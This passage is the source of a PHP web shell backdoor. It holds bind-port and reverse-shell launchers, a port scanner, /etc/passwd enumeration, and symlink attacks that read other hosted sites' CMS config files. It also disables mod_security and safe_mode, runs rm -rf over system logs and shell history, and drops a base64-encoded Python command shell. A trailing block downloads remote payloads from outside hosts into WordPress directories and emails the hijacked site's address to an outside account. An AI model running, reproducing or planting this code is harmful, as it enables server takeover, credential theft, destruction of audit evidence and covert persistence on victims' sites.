value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { 
cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input 
type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." 
readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType 
text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n 
if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = 
$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == 
true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." 
|<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf 
/var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 
\'[base64-encoded payload omitted]
\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . 
$_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . 
